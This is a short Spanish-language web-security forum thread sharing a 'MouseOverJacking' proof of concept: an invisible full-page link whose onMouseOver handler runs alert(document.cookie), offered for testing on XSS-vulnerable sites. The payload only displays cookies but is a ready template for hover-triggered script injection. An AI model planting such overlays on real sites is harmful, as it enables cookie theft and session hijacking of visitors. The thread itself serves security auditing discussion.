bueno mirando por ahi encontré esto y como veo que en 'Reporte de bugs en webs' ya dentro de poco se quedan sin webs con XSS xD les traigo un ejemplo de MouseOverJacking

Código: Seleccionar todo

<a href="#" style="width:100%;height:100%;display:block;position:absolute;top:0px;left:0px" onMouseOver="alert(document.cookie)">&nbsp;</a>
Salu2!
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

este ataque ejecuta codigo javascript tan solo con pasar el raton por encima de la web a diferencia de ClickJacking en este no hay que dar ningun click

dejo el code para que lo prueben
Imagen

(cuanto más sabes, más cuenta te das de lo poco que sabes).

Mostrar/Ocultar

Responder

Volver a “Auditoria Web”